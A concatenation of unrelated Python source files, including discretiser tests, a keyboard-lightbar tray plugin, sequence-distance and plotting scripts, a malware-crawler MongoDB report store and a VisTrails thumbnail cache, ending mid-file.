test_error_if_return_object_not_bool(): with pytest.raises(ValueError): EqualFrequencyDiscretiser(return_object="other") def test_error_if_input_df_contains_na_in_fit(df_na): # test case 3: when dataset contains na, fit method with pytest.raises(ValueError): transformer = EqualFrequencyDiscretiser() transformer.fit(df_na) def test_error_if_input_df_contains_na_in_transform(df_vartypes, df_na): # test case 4: when dataset contains na, transform method with pytest.raises(ValueError): transformer = EqualFrequencyDiscretiser() transformer.fit(df_vartypes) transformer.transform(df_na[["Name", "City", "Age", "Marks", "dob"]]) def test_non_fitted_error(df_vartypes): with pytest.raises(NotFittedError): transformer = EqualFrequencyDiscretiser() transformer.transform(df_vartypes) import numpy as np from PyQt5.QtGui import * from PyQt5.QtWidgets import * class TuxedoKeyboard: def __init__(self, node): self.node = node self.gamma = (0.55, 0.48, 0.43) # needs to be calibrated self.state = node.load_state() # init qt gui menu = node.get_tray_menu() app = node.get_application() self.init_gui(menu, app) # register callbacks self.node.add_event_callback("resume", self.on_resume) self.node.add_event_callback("suspend", self.on_suspend) self.node.add_event_callback("lid_opened", self.on_lid_opened) self.node.add_event_callback("lid_closed", self.on_lid_closed) self.node.add_event_callback("on_ac", self.on_ac) self.node.add_event_callback("on_battery", self.on_battery) self.node.add_event_callback("exit", self.on_exit) self.reload_state() def on_resume(self, event): self.reload_state() def on_suspend(self, event): self.apply_lightbar_color( (0.0, 0.0, 0.0), save_state=False) def on_lid_opened(self, event): pass #self.reload_state() def on_lid_closed(self, event): pass #self.apply_lightbar_color( (0.0, 
0.0, 0.0), save_state=False) def on_ac(self, event): pass def on_battery(self, event): pass def on_exit(self, event): self.apply_lightbar_color( (0.0, 0.0, 0.0), save_state=False) def reload_state(self): if self.state is not None and "lb_mode" in self.state: if self.state["lb_mode"] == "mono": self.apply_lightbar_color(self.state["value"]) elif self.state["lb_mode"] == "animation": self.apply_lightbar_animation(self.state["value"]) else: # default: self.apply_lightbar_animation() def init_gui(self, menu, app): self.lb = QMenu("LightBar") self.lb_ac0 = QAction("Turn Off"); self.lb_ac0.triggered.connect(lambda: self.apply_lightbar_color( (0.0, 0.0, 0.0)) ); self.lb.addAction(self.lb_ac0) self.lb_ac1 = QAction("Animation"); self.lb_ac1.triggered.connect(lambda: self.apply_lightbar_animation() ); self.lb.addAction(self.lb_ac1) self.lb_ac2 = QAction("White"); self.lb_ac2.triggered.connect(lambda: self.apply_lightbar_color( (1.0, 1.0, 1.0)) ); self.lb.addAction(self.lb_ac2) self.lb_ac3 = QAction("Red"); self.lb_ac3.triggered.connect(lambda: self.apply_lightbar_color( (1.0, 0, 0)) ); self.lb.addAction(self.lb_ac3) self.lb_ac4 = QAction("Green"); self.lb_ac4.triggered.connect(lambda: self.apply_lightbar_color( ( 0, 1.0, 0)) ); self.lb.addAction(self.lb_ac4) self.lb_ac5 = QAction("Blue"); self.lb_ac5.triggered.connect(lambda: self.apply_lightbar_color( ( 0, 0, 1.0)) ); self.lb.addAction(self.lb_ac5) self.lb_ac6 = QAction("Pick a color"); self.lb_ac6.triggered.connect(lambda: self.apply_lightbar_color( self.mono_color_picker()) ); self.lb.addAction(self.lb_ac6) menu.addMenu(self.lb) def color_to_voltage(self, color): return np.power(color, 1./np.array(self.gamma)) def mono_color_picker(self): color = QColorDialog.getColor().getRgb() return (color[0]/255, color[1]/255, color[2]/255) def apply_lightbar_color(self, color, save_state=True): voltage = self.color_to_voltage(color) with open('/sys/class/leds/lightbar_rgb:1:status/brightness', 'w') as f: f.write(str(int(voltage[0]*36))) with open('/sys/class/leds/lightbar_rgb:2:status/brightness', 'w') as f: f.write(str(int(voltage[1]*36))) with open('/sys/class/leds/lightbar_rgb:3:status/brightness', 'w') as f: f.write(str(int(voltage[2]*36))) if save_state: self.state = {"lb_mode": "mono", "value": color} self.node.save_state(self.state) def apply_lightbar_animation(self, value=1, save_state=True): with open('/sys/class/leds/lightbar_animation::status/brightness', 'w') as f: f.write(str(int(value))) if save_state: self.state = {"lb_mode": "animation", "value": value} self.node.save_state(self.state)#!/usr/bin/env python import collections import sys import itertools from optparse import OptionParser from Bio import AlignIO import numpy def ham(s1, s2): """Return the Hamming distance between equal-length sequences""" if len(s1) != len(s2): raise ValueError("Undefined for sequences of unequal length") mm=0 sup=0 for el1, el2 in zip(s1, s2): if el1=='-' and el2=='-': continue sup +=1 if el1 != el2: mm +=1 return mm*1.0/sup def get_consensus(matrix): output = '' for i in range(matrix.shape[1]): site = collections.Counter(matrix[:, i]).most_common(1)[0][0] output += site return output if __name__ == "__main__": parser = OptionParser() parser.add_option("-i", "--input", dest="input_fp", help="path to the input OTU table in gg format", metavar="FILE") parser.add_option("-a", "--alignment", dest="alignment_fp", help="path to the input gg alignment file", metavar="FILE") parser.add_option("-l", "--log", dest="log_fp", help="path to log file", metavar="FILE") # 
parser.add_option("-o", "--output", dest="output_fp", # help="path to the output greengenes otu table file", metavar="FILE") (options, args) = parser.parse_args() input_fp = options.input_fp alignment_fp = options.alignment_fp log_fp = options.log_fp #print("Reading input") fin = open(input_fp, "r") otus = map(lambda x: x.strip().split('\t')[1:], fin.readlines()) fin.close() alignment = AlignIO.read(open(alignment_fp), 'fasta') mp = dict([(record.id, record.seq.__str__()) for record in alignment]) flog = open(log_fp, "w") ind = 0 weights = 0 for otu in otus: if len(otu) > 1: otu_seqs = [] for sq in otu: otu_seqs.append(mp[sq]) k = numpy.array(list(map(lambda x: list(x), otu_seqs))) consensus = get_consensus(k) dm = numpy.zeros(len(otu)) for i in range(len(otu)): dm[i] = ham(mp[otu[i]], consensus) sum = numpy.sum(dm) flog.write(str(len(dm)) + '\t' + str(sum) + '\n') sum = sum * 1.0 / len(dm) ind += sum weights += 1 #print(ind * 1.0 / weights) ind = ind * 1.0 / weights print(ind) flog.close() rtb7rd/cs3240-labdemo __author__ = 'Student' import helper helper.greeting("hello") K4lium/Snakepit # Copyright (C) 2013-2015 Ragpicker Developers. # This file is part of Ragpicker Malware Crawler - http://code.google.com/p/malware-crawler/ import logging from yapsy.IPlugin import IPlugin from core.database import Database from core.abstracts import Report log = logging.getLogger("MongoDB") class MongoDB(IPlugin, Report): """Stores report in MongoDB.""" def run(self, results, objfile): """Writes report. @param results: analysis results dictionary. @param objfile: file object """ database = Database() # Count query using URL hash and file hash count = database.countRagpickerDB(results["Info"]["file"]["md5"], results["Info"]["url"]["md5"]) # If report available for the file and url -> not insert if count == 0: # Create a copy of the dictionary. This is done in order to not modify # the original dictionary and possibly compromise the following # reporting modules. report = dict(results) # Store the report database.insertRagpickerDB(report) count = database.countFamilyDB(objfile.family.parentObjectSHA256) if count == 0: if objfile.family.unpackedObjectSHA256 != "" or len(objfile.family.siblingObjectsSHA256) > 0: log.info(objfile.family) report = dict(objfile.family.__dict__) database.insertFamily(report) def deleteAll(self): """Deletes all reports. 
""" # Alle Ragpicker-Daten aus der MongoDB loeschen count = Database().deleteRagpickerDB() print "*** MongoDB (Ragpicker)***" print "deleted documents:" + str(count) print "" count = Database().deleteFamilyDB() print "*** MongoDB (Family)***" print "deleted documents:" + str(count) print "" count = Database().deleteSandboxTaskQueueDB() print "*** MongoDB (SandboxTaskQueue)***" print "deleted documents:" + str(count) print "" mesarcik/NLN import tensorflow as tf import numpy as np import copy from .patches import get_patches #TODO this certainly is not the most efficient, pythonic, nor tensorflowic way of doing things def random_rotation(images, masks = None): """ Applies random discrete rotation based augmentations to the test data and to their masks (if applicable) The discrete rotations are [0,90,180,270,360] degrees Parameters ---------- images (np.array) mask_images (optional, np.array) Returns ------- np.array, (optional) np.array """ r_images = copy.deepcopy(images) if masks is not None: masks = np.expand_dims(masks,axis=-1) r_masks = copy.deepcopy(masks) for i in range(images.shape[0]): k = np.random.randint(0,5) rot_cond = tf.less(tf.random.uniform([], 0, 1.0), .5) r_images[i,...] = tf.cond(rot_cond, lambda: tf.image.rot90(images[i,...],k), lambda: images[i,...]) if masks is not None: r_masks[i,...] = tf.cond(rot_cond, lambda: tf.image.rot90(masks[i,...],k), lambda: masks [i,...]) if masks is not None: return np.concatenate([images,r_images],axis=0), np.concatenate([masks,r_masks],axis=0)[...,0] else: return np.concatenate([images,r_images],axis=0) def random_crop(images, crop_size): """ Applies central crop and then random crop based augmentations to the test data and to their masks (if applicable) Parameters ---------- images (np.array) crop_size (list-like) Returns ------- np.array Raises: ------- ValueError: If the shape of `image` is incompatible with the `masks` """ assert(images.shape[1] *0.9 > crop_size[0], ValueError, 'X dimension of crop must be greater than X of crop') assert(images.shape[2]*0.9 > crop_size[1], ValueError, 'Y dimension of crop must be greater than Y of crop') images = tf.image.central_crop(images ,0.8).numpy() images_,_ = get_patches(images, np.zeros(len(images)), (1, int(1.7*crop_size[0]), int(1.7*crop_size[1]), 1), (1, int(1.7*crop_size[0]), int(1.7*crop_size[1]), 1), (1,1,1,1), 'VALID') r_images = np.empty([images_.shape[0], crop_size[0], crop_size[1], images_.shape[-1]]) for i in range(images_.shape[0]): x_offset = np.random.randint(0, images_.shape[1] - crop_size[0] + 1) y_offset = np.random.randint(0, images_.shape[2] - crop_size[1] + 1) r_images[i,...] 
= tf.image.crop_to_bounding_box(images_[i,...], x_offset, y_offset, crop_size[0], crop_size[1]) return r_images.astype('uint8') LukasMosser/DeepFlow import numpy as np from mpl_toolkits.axes_grid1 import make_axes_locatable import matplotlib.pyplot as plt import xarray as xr import pandas as pd import numpy as np import scipy.io as io import os import scipy.stats from skimage import measure from skimage.morphology import binary_dilation from scipy import stats from tqdm import tqdm as tqdm import matplotlib import matplotlib.colors as colors import matplotlib.cm as cmx def update_matplotlib_config(): # inspired by http://nipunbatra.github.io/2014/08/latexify/ params = { 'text.latex.preamble': ['\\usepackage{gensymb}'], 'image.origin': 'lower', 'image.interpolation': 'nearest', 'image.cmap': 'gray', 'axes.grid': False, 'savefig.dpi': 150, # to adjust notebook inline plot size 'axes.labelsize': 8, # fontsize for x and y labels (was 10) 'axes.titlesize': 8, 'font.size': 8, # was 10 'legend.fontsize': 10, # was 10 'xtick.labelsize': 14, 'ytick.labelsize': 14, 'text.usetex': True, 'figure.figsize': [14, 12], 'font.family': 'serif', } matplotlib.rcParams.update(params) return True def load_gt_model_from_numpy(file): gt = np.load(file) return gt[0, :, ::-1].T def get_reference_curves(working_dir, perm, case='/reference/reference_noise.nc'): ds_ref = xr.open_dataset(working_dir+perm+case) qor_ref = ds_ref['state_variables'][dict(state_variable=2, well=1)]*(-60*60*24) qwr_ref = ds_ref['state_variables'][dict(state_variable=1, well=1)]*(-60*60*24) p_ref = ds_ref['state_variables'][dict(state_variable=0, well=0)]/1e5 return [qor_ref, qwr_ref, p_ref] def extract_curves(folder, N=500): qor_curves = [] qwr_curves = [] p_curves = [] perms, poros = [], [] material_grads = [] for i in tqdm(range(0, N)): try: ds = xr.open_dataset(folder+'/iteration_'+str(i)+'.nc') qor_curves.append(ds['state_variables'][dict(state_variable=2, well=1)]*(-60*60*24)) qwr_curves.append(ds['state_variables'][dict(state_variable=1, well=1)]*(-60*60*24)) p_curves.append(ds['state_variables'][dict(state_variable=0, well=0)]/1e5) perms.append(ds['material_properties'][1].values) poros.append(ds['material_properties'][0].values) material_grads.append(ds['material_derivatives'].values) ds.close() except FileNotFoundError or KeyError: pass return np.array(qor_curves), np.array(qwr_curves), np.array(p_curves), np.array(perms), np.array(material_grads), np.array(poros) def inverse_permeability_transform(x, a=0.001, b=1e-12): return x/b-a def plot_colored_rate_curves(axarr, min_curves, iterations_to_show, ref_curves, dts, method="-Adam", color="blue", alpha=0.1, ref_color="red", cmap="coolwarm"): selected_curves = min_curves[iterations_to_show] jet = cm = plt.get_cmap(cmap) log_total = iterations_to_show cNorm = colors.Normalize(vmin=np.min(log_total), vmax=np.max(log_total)) scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=jet) cs = [scalarMap.to_rgba(j) for j in log_total] for j, (curves, idx) in enumerate(zip(selected_curves, iterations_to_show)): if j == len(selected_curves)-1: for k in range(3): axarr[k].plot(dts, curves[k], color=cs[j], alpha=0.5, label="Simulated") else: for k in range(3): cbar_handle = axarr[k].plot(dts, curves[k], color=cs[j], alpha=0.5) for k in range(3): axarr[k].plot(dts, selected_curves[0][k], color='black', linewidth=2, linestyle="-.", alpha=1.0, label="Initial") for k in range(3): axarr[k].plot(dts, min_curves[iterations_to_show[-1]][k], color='black', alpha=1.0, linewidth=4, linestyle="--", label=r"Minimum 
$\mathcal{L}(\mathbf{z})$") for i, t, loc in zip(range(3), ["Water Rate [m3/d]", "Oil Rate [m3/d]", "Pressure [Bar]"], [0, 1, 1]): axarr[i].scatter(dts, ref_curves[i], color=ref_color, marker="x", s=100, label="Observed", zorder=100) axarr[i].set_ylabel(t, fontsize=16) axarr[i].legend(fontsize=20, loc=loc) for a in axarr: a.set_xlabel("Time [days]", fontsize=16) axarr[0].set_ylim(-5, 325) axarr[1].set_ylim(-5, 325) axarr[2].set_yscale("log") axarr[2].set_ylim(150, 100000) scalarMap._A = [] plt.colorbar(scalarMap) for a, label, left, up in zip(axarr.flatten(), ["a)", "b)", "c)"], [-30]*3, [330, 330, 1.15e5]*3): a.text(left, up, label, fontsize=22) axarr[2].text(800, 2e4, r"Optimization Iteration", rotation=90, fontsize=24) return True def plot_colored_rate_curves_loss(axarr, min_curves, losses, iterations_to_show, min_iteration, ref_curves, dts, method="-Adam", color="blue", alpha=0.1, ref_color="red", cmap="coolwarm"): selected_curves = min_curves[iterations_to_show] losses = np.log10(losses[iterations_to_show]) jet = cm = plt.get_cmap(cmap) log_total = losses cNorm = colors.Normalize(vmin=np.min(log_total), vmax=np.max(log_total)) scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=jet) cs = [scalarMap.to_rgba(j) for j in log_total] for j, (curves, idx) in enumerate(zip(selected_curves, iterations_to_show)): if j == len(selected_curves)-1: for k in range(3): axarr[k].plot(dts, curves[k], color=cs[j], alpha=0.5, label="Simulated") else: for k in range(3): cbar_handle = axarr[k].plot(dts, curves[k], color=cs[j], alpha=0.5) for k in range(3): axarr[k].plot(dts, selected_curves[0][k], color='green', linewidth=4, linestyle="-.", alpha=1.0, label="Initial") for k in range(3): axarr[k].plot(dts, min_curves[min_iteration, k, :][0], color='black', alpha=1.0, linewidth=4, linestyle="--", label=r"Minimum $\mathcal{L}(\mathbf{z})$") for i, t, loc in zip(range(3), ["Water Rate [m3/d]", "Oil Rate [m3/d]", "Pressure [Bar]"], [0, 1, 1]): axarr[i].scatter(dts, ref_curves[i], color=ref_color, marker="x", s=60, label="Observed", zorder=100) axarr[i].set_ylabel(t, fontsize=16) axarr[i].legend(fontsize=20, loc=loc) for a in axarr: a.set_xlabel("Time [days]", fontsize=16) axarr[0].set_ylim(-5, 325) axarr[1].set_ylim(-5, 325) axarr[2].set_yscale("log") axarr[2].set_ylim(150, 100000) scalarMap._A = [] plt.colorbar(scalarMap) for a, label, left, up in zip(axarr.flatten(), ["a)", "b)", "c)"], [-30]*3, [330, 330, 1.15e5]*3): a.text(left, up, label, fontsize=22) axarr[2].text(800, 2e4, r"Total Loss $\log[\mathcal{L}(\mathbf{z})]$", rotation=90, fontsize=24) return True def plot_rate_curves(axarr, min_curves, ref_curves, dts, method="-Adam", color="blue", alpha=0.05, ref_color="red"): for j, curves in enumerate(min_curves): if j == len(min_curves)-1: for k in range(3): axarr[k].plot(dts, curves[k], color=color, alpha=alpha, label="Simulated") else: for k in range(3): axarr[k].plot(dts, curves[k], color=color, alpha=alpha) for i in range(3): axarr[i].plot(dts, np.mean(min_curves[:, i], axis=0), linewidth=2, linestyle="-.", color="green", label="Mean") for a in axarr: a.set_xlabel("Time [days]") axarr[0].set_ylim(-5, 325) axarr[1].set_ylim(-5, 325) axarr[2].set_yscale("log") axarr[2].set_ylim(150, 20000) for i, t, s in zip(range(3), ["Water Rate [m3/d]", "Oil Rate [m3/d]", "Pressure [Bar]"], [8, 8, 20]): axarr[i].scatter(dts, ref_curves[i], color=ref_color, label="Observed", marker="x", s=s, alpha=1.0) axarr[i].set_ylabel(t) axarr[i].legend() def plot_rate_bounds(axarr, min_curves, ref_curves, dts, method="-Adam"): 
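    # Note (added): this helper plots the ensemble mean of the simulated
    # water-rate, oil-rate and pressure curves with a shaded band plus the
    # observed reference points. `mean_confidence_interval` (defined further
    # below) actually returns mean +/- one standard deviation, so the
    # "Mean $\pm 95\%$ conf." legend label is only approximate.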
mean_curves, lower, upper = mean_confidence_interval(min_curves) for i, t, s in zip(range(3), ["Water Rate [m3/d]", "Oil Rate [m3/d]", "Pressure [Bar]"], [8, 8, 20]): axarr[i].plot(dts, mean_curves[i], color="black", linestyle="-", label="Avg. Simulated") axarr[i].plot(dts, upper[i], color="black", linestyle="--") axarr[i].plot(dts, lower[i], color="black", linestyle="--") axarr[i].fill_between(dts, lower[i], upper[i], color="gray", alpha=0.5, label=r"Mean $\pm 95\%$ conf.") axarr[i].scatter(dts, ref_curves[i], color="red", marker="x", label="Observed", s=s) axarr[i].set_ylabel(t) axarr[i].legend() for a in axarr: a.set_xlabel("Time [days]") axarr[0].set_ylim(-5, 325) axarr[1].set_ylim(-5, 325) axarr[2].set_yscale("log") axarr[2].set_ylim(150, 20000) def plot_facies(axarr, min_poroperms, envelope=None): x = np.where(min_poroperms[:, 1]>1e-13, 1, 0) mean = x.mean(axis=0)[::-1] std = x.std(axis=0)[::-1] sx1 = axarr[0].imshow(mean, vmin=0, vmax=1) axarr[0].set_xticks([]) axarr[0].set_yticks([]) axarr[0].set_ylabel("Mean", fontsize=12) colorbar(sx1) sx2 = axarr[1].imshow(std, vmin=0, vmax=0.5) axarr[1].set_xticks([]) axarr[1].set_yticks([]) axarr[1].set_ylabel("Std. Dev.", fontsize=12) colorbar(sx2) if envelope is not None: axarr[0].contour(envelope, colors="r", linewidths=(0.2, ), alpha=0.5) axarr[1].contour(envelope, colors="r", linewidths=(0.2, ), alpha=0.5) def plot_row_envelopes(i, properties, curves, ref_curves, dts, envelope=None, desc=""): ax1 = plt.subplot2grid((8, 4*2), (i, 0), rowspan=1, colspan=2) ax2 = plt.subplot2grid((8, 4*2), (i+1, 0), rowspan=1, colspan=2) ax2.annotate(desc, xy=(0, 0.0), xytext=(-0.25, 1.5), textcoords='axes fraction', rotation=90, fontsize=14) plot_facies([ax1, ax2], properties, envelope) ax3 = plt.subplot2grid((8, 4*2), (i, 2), rowspan=2, colspan=2) ax4 = plt.subplot2grid((8, 4*2), (i, 4), rowspan=2, colspan=2) ax5 = plt.subplot2grid((8, 4*2), (i, 6), rowspan=2, colspan=2) plot_rate_bounds([ax3, ax4, ax5], curves, ref_curves, dts) def plot_row_curves(i, properties, curves, ref_curves, dts, envelope=None, desc=""): ax1 = plt.subplot2grid((8, 4*2), (i, 0), rowspan=1, colspan=2) ax2 = plt.subplot2grid((8, 4*2), (i+1, 0), rowspan=1, colspan=2) ax2.annotate(desc, xy=(0, 0.0), xytext=(-0.25, 1.5), textcoords='axes fraction', rotation=90, fontsize=14) plot_facies([ax1, ax2], properties, envelope) ax3 = plt.subplot2grid((8, 4*2), (i, 2), rowspan=2, colspan=2) ax4 = plt.subplot2grid((8, 4*2), (i, 4), rowspan=2, colspan=2) ax5 = plt.subplot2grid((8, 4*2), (i, 6), rowspan=2, colspan=2) plot_rate_curves([ax3, ax4, ax5], curves, ref_curves, dts) def to_deltas(dt): dts = [dt[0]] for i in range(1, len(dt)): dts.append(dts[i-1]+dt[i]) return np.array(dts) def create_simulation_time_axis(): dt_1 = to_deltas([1, 1, 3, 5, 5, 10, 10, 10, 15, 15, 15, 15, 15, 15, 15]) dt_2 = 150+to_deltas(np.array([15]*10)) dt_3 = 300+to_deltas([25]*6) dt_4 = 450+to_deltas([25]*6) dts = np.concatenate([dt_1, dt_2, dt_3, dt_4]) return dts def extract_min_misfits(misfits, pos): mins = np.array([(i, np.argmin(x[:, pos], axis=0), x[np.argmin(x[:, pos], axis=0), pos]) for i, x in enumerate(misfits) if len(x) != 0]) return mins def load_folders(working_dir, folders, functionals=["min_f", "min_f", "min_f"]): temp = [] temp_poroperms = [] temp_zs = [] for folder, functional in zip(folders, functionals): min_f_curves = np.load(os.path.join(working_dir, folder, functional+"_curves.npy")) min_f_poroperms = np.load(os.path.join(working_dir, folder, functional+"_poroperms.npy")) min_f_zs = 
np.load(os.path.join(working_dir, folder, functional+"_zs.npy")) temp.append([min_f_curves]) temp_poroperms.append([min_f_poroperms]) temp_zs.append([min_f_zs]) return temp, temp_poroperms, temp_zs def colorbar(mappable): ax = mappable.axes fig = ax.figure divider = make_axes_locatable(ax) cax = divider.append_axes("right", size="5%", pad=0.05) return fig.colorbar(mappable, cax=cax) def get_unconditionals(working_dir, perm, N=1000): curves = [] poros, perms = [], [] zs = [] misfits = [] for i in range(0, N): try: folder = os.path.join(working_dir, perm, 'unconditional_bce/run_'+str(i)) ds = xr.open_dataset(folder+'/iteration_0.nc') qo = ds['state_variables'][dict(state_variable=2, well=1)]*(-60*60*24) qw = ds['state_variables'][dict(state_variable=1, well=1)]*(-60*60*24) p = ds['state_variables'][dict(state_variable=0, well=0)]/1e5 poros.append(ds['material_properties'][0].values) perms.append(ds['material_properties'][1].values) curves.append([qo, qw, p]) zs.append([ds['latent_variables'].values]) misfits.append([ds['misfit_value'].values]) ds.close() except FileNotFoundError: print(i, " not found ") if i % 100 == 99: print(i) return np.array(curves), np.array(poros), np.array(perms), np.array(zs), np.array(misfits) def mean_confidence_interval(data, confidence=0.95): a = 1.0 * np.array(data) n = data.shape[0] m, se = np.mean(a, axis=0), scipy.stats.sem(a, axis=0) h = np.std(a, axis=0) return m, m-h, m+h def determine_connected(facies, dilation=False): if dilation: facies = binary_dilation(facies) connected = measure.label(facies[::-1], background=0) labels = np.unique(connected) for label in labels[1:]: cluster_only = np.where(connected == label, 1, 0) well_a = cluster_only[:, 8:10] well_b = cluster_only[:, 119:121] if np.sum(well_a) > 0 and np.sum(well_b) > 0: return True return False def plot_misfit_histograms(axarr, misfits): t_error = pd.DataFrame([m[:, -1] for m in misfits]) threshs = [] error_threshs = [1e3, 1e2, 1e1, 1e0, 1e0] for t in error_threshs: temp = [] for row in t_error.values: minim = [np.NaN, np.NaN] for i, value in enumerate(row): if value <= t: minim = [i, value] break temp.append(minim) threshs.append(temp) threshs = np.array(threshs) for idx_thresh, ax, e, m in zip(range(0, 3), axarr, [[1, 3], [1, 2], [1, 1]], [100, 100, 500]): non_nan = np.sum(~np.isnan(threshs[idx_thresh, :, 0])) theshs_non_nan = threshs[idx_thresh, :, 0][~np.isnan(threshs[idx_thresh, :, 0])] mode = stats.mode(theshs_non_nan)[0] mean = np.mean(theshs_non_nan) ax.axvline(mean, linestyle="--", color="red", label="Mean: "+str(int(np.ceil(mean)))+" (N="+str(non_nan)+")") ax.hist(theshs_non_nan, histtype="step", color="black", linestyle="-", lw=4, label=r'Histogram $\mathcal{L}(\mathbf{z})='+str(e[0])+r'\times 10^{'+str(e[1])+'}$') ax.legend(fontsize=22, loc=1) ax.set_xlim(0, m) ax.set_ylim(0, 100) ax.set_xlabel("Iterations", fontsize=18) for ax in axarr: handles, labels = ax.get_legend_handles_labels() order = [1,0] ax.legend([handles[idx] for idx in order],[labels[idx] for idx in order], fontsize=20) axarr[0].set_ylabel("Number of Models", fontsize=20) ############################################################################### ## ## Copyright (C) 2011-2014, NYU-Poly. ## Copyright (C) 2006-2011, University of Utah. ## All rights reserved. ## Contact: ## ## This file is part of VisTrails. 
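# --- Illustrative sketch (added by the editor, not part of the sources above).
# `mean_confidence_interval` in the DeepFlow utilities earlier in this section
# computes the standard error but then returns mean +/- one standard
# deviation. A t-based 95% interval over the first axis would look like:
import numpy as np
import scipy.stats


def mean_confidence_interval_t(data, confidence=0.95):
    a = np.asarray(data, dtype=float)
    n = a.shape[0]
    m = np.mean(a, axis=0)
    se = scipy.stats.sem(a, axis=0)
    h = se * scipy.stats.t.ppf((1.0 + confidence) / 2.0, n - 1)
    return m, m - h, m + h
# --- End of illustrative sketch.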
## ## "Redistribution and use in source and binary forms, with or without ## modification, are permitted provided that the following conditions are met: ## ## - Redistributions of source code must retain the above copyright notice, ## this list of conditions and the following disclaimer. ## - Redistributions in binary form must reproduce the above copyright ## notice, this list of conditions and the following disclaimer in the ## documentation and/or other materials provided with the distribution. ## - Neither the name of the University of Utah nor the names of its ## contributors may be used to endorse or promote products derived from ## this software without specific prior written permission. ## ## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" ## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, ## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR ## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR ## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, ## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, ## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; ## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, ## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR ## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." ## ############################################################################### import itertools """ Utilities for dealing with the thumbnails """ import os import os.path import shutil import time import uuid import mimetypes # mimetypes are broken by default on windows so use the builtins # Remove line below when it is fixed here: http://bugs.python.org/issue15207 mimetypes.init(files=[]) from vistrails.core import debug from vistrails.core.configuration import get_vistrails_configuration, \ get_vistrails_persistent_configuration from vistrails.core.utils import VistrailsInternalError ############################################################################ class CacheEntry(object): def __init__(self, abs_name, name, time, size): self.abs_name = abs_name self.name = name self.time = time self.size = size class ThumbnailCache(object): _instance = None IMAGE_MAX_WIDTH = 200 SUPPORTED_TYPES = ['image/png','image/jpeg','image/bmp','image/gif'] @staticmethod def getInstance(*args, **kwargs): if ThumbnailCache._instance is None: obj = ThumbnailCache(*args, **kwargs) ThumbnailCache._instance = obj return ThumbnailCache._instance def __init__(self): self.elements = {} self.vtelements = {} self.conf = None conf = get_vistrails_configuration() if conf.has('thumbs'): self.conf = conf.thumbs self.init_cache() def get_directory(self): if self.conf.check('cacheDirectory'): thumbnail_dir = self.conf.cacheDirectory if not os.path.exists(thumbnail_dir): raise VistrailsInternalError("Cannot find %s" % thumbnail_dir) return thumbnail_dir raise VistrailsInternalError("'thumbs.cacheDirectory' not" " specified in configuration") return None def init_cache(self): for root,dirs, files in os.walk(self.get_directory()): for f in files: fname = os.path.join(root,f) statinfo = os.stat(fname) size = int(statinfo[6]) time = float(statinfo[8]) entry = CacheEntry(fname, f, time, size) self.elements[f] = entry def get_abs_name_entry(self,name): """get_abs_name_entry(name) -> str It will look for absolute file path of name in self.elements and 
self.vtelements. It returns None if item was not found. """ try: return self.elements[name].abs_name except KeyError, e: try: return self.vtelements[name].abs_name except KeyError, e: return None def size(self): size = 0 for entry in self.elements.itervalues(): size += entry.size return size def move_cache_directory(self, sourcedir, destdir): """change_cache_directory(sourcedir: str, dest_dir: str) -> None" Moves files from sourcedir to destdir """ if os.path.exists(destdir): for entry in self.elements.itervalues(): try: srcname = entry.abs_name dstname = os.path.join(destdir,entry.name) shutil.move(srcname,dstname) entry.abs_name = dstname except shutil.Error, e: debug.warning("Could not move thumbnail from %s to %s" % ( sourcedir, destdir), e) def remove_lru(self,n=1): elements = self.elements.values() elements.sort(key=lambda obj: obj.time) num = min(n,len(elements)) debug.debug("Will remove %s elements from cache..."%num) debug.debug("Cache has %s elements and %s bytes"%(len(elements), self.size())) for elem in itertools.islice(elements, num): try: del self.elements[elem.name] os.unlink(elem.abs_name) except os.error, e: debug.warning("Could not remove file %s" % elem.abs_name, e) def remove(self,key): if key in self.elements.keys(): entry = self.elements[key] del self.elements[key] os.unlink(entry.abs_name) elif key in self.vtelements.keys(): entry = self.vtelements[key] del self.vtelements[key] os.unlink(entry.abs_name) def clear(self): self.elements = {} self._delete_files(self.get_directory()) def add_entry_from_cell_dump(self, folder, key=None): """create_entry_from_cell_dump(folder: str) -> str Creates a cache entry from images in folder by merge them in a single image and returns the name of the image in cache. If a valid key is provided, it will use it as the name of the image file. """ image = None thumbnail_fnames = self._get_thumbnail_fnames(folder) if len(thumbnail_fnames) > 0: image = self._merge_thumbnails(thumbnail_fnames) fname = None if image != None and image.width() > 0 and image.height() > 0: fname = "%s.png" % str(uuid.uuid1()) abs_fname = self._save_thumbnail(image, fname) statinfo = os.stat(abs_fname) size = int(statinfo[6]) time = float(statinfo[8]) entry = CacheEntry(abs_fname, fname, time, size) #remove old element if key: self.remove(key) if self.size() + size > self.conf.cacheSize*1024*1024: self.remove_lru(10) self.elements[fname] = entry return fname def add_entries_from_files(self, absfnames): """add_entries_from_files(absfnames: list of str) -> None In this case the files already exist somewhere on disk. We just keep references to them. """ for abs_fname in absfnames: fname = os.path.basename(abs_fname) statinfo = os.stat(abs_fname) size = int(statinfo[6]) time = float(statinfo[8]) entry = CacheEntry(abs_fname, fname, time, size) self.vtelements[fname] = entry @staticmethod def _delete_files(dirname): """delete_files(dirname: str) -> None Deletes all files inside dirname """ try: for root, dirs, files in os.walk(dirname): for fname in files: os.unlink(os.path.join(root,fname)) except OSError, e: debug.warning("Error when removing thumbnails", e) @staticmethod def _get_thumbnail_fnames(folder): """Returns the filenames of the images to be composited in the given folder. 
